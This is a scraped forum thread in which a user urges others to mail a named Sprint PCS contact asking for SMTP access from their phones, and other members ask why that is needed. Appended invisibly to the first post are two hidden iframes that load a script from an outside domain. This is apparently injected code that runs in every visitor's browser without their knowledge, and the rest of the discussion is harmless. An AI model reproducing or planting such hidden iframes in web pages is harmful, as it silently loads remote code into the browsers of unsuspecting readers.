+ Reply to Thread

How to access SMTP with Sprint PCS

After calling Sprint and trying to find a way to access their SMTP server, I was given a name and address of who to contact about allowing us to have access Sprint SMTP server.

If you would like to help me convince sprint to allow us to acces the SMTP so we can send emails from our phones send a letter explaining our dilema and how we need access to the SMTP server. The address is:

Antonio Castianio
    Sprint PCS
    P.O. Box 8077
    London, KY. 40742

Please help me in my battle to be able to send emails from my phone by sending a letter!!!

Thanks for all the help.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

im all for it... however, im not good at sending out "corporate letters".. if yuo could, say, put up a template leter that i could go by that would help me out..

:p

Good idea Marc. Post a template and we can all download it, sign it, and send it off.

Silly question though, what is the advantage of doing this? Why not just use Eudora (or something similar) and utilize existing SMTP email services that we already have? What am I missing?

Craig

Administrator

Arrow

i agree.. i am using gopherking.com to access my MSN andi pay 20/year to use the service.. which is actually great.. i was using it back in the 605 days... but most folks on here dont want to pay for the service..

I think I am still missing something.

I have Prodigy and also Ureach. They both allow SMTP access using for example Outlook Express. I downloaded Eudora for my i300, and access these mailboxes that way. Why would I need to access Sprint's SMTP server?

Craig

Administrator

Arrow

Originally posted by csherman
    I think I am still missing something.